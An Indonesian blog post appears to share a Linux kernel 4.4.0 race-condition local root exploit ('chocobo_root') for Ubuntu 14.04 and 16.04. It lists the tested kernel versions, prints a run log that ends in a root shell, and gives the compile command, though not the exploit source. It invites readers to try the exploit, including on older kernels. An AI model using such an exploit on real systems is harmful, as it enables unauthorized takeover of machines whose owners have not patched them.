Linux Kernel 4.4.0 Race Condition Privilege Escalation

Yo, Kali ini cuma mau share localroot yang barusaja dipublish beberapa hari yang lalu. Localroot ini menyerang kernel 4.4.0 yang berarti vuln di Ubuntu 14.04 dan Ubuntu 16.04.

Kernel yang sudah di test :
  • Ubuntu 16.04: 4.4.0-51-generic
  • Ubuntu 16.04: 4.4.0-47-generic
  • Ubuntu 16.04: 4.4.0-36-generic
  • Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Kemungkinan localroot ini juga berlaku untuk mendapatkan hak akses root di kernel yang lebih tua dari 4.4.0 . Jadi silahkan di test sendiri saja.
Log :

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 133577, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don’t do that.
closing socket and verifying…….
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cara compile :

gcc chocobo_root.c -o chocobo_root -lpthread

Oke sekian artikel kali ini, see you next time.


Leave a Reply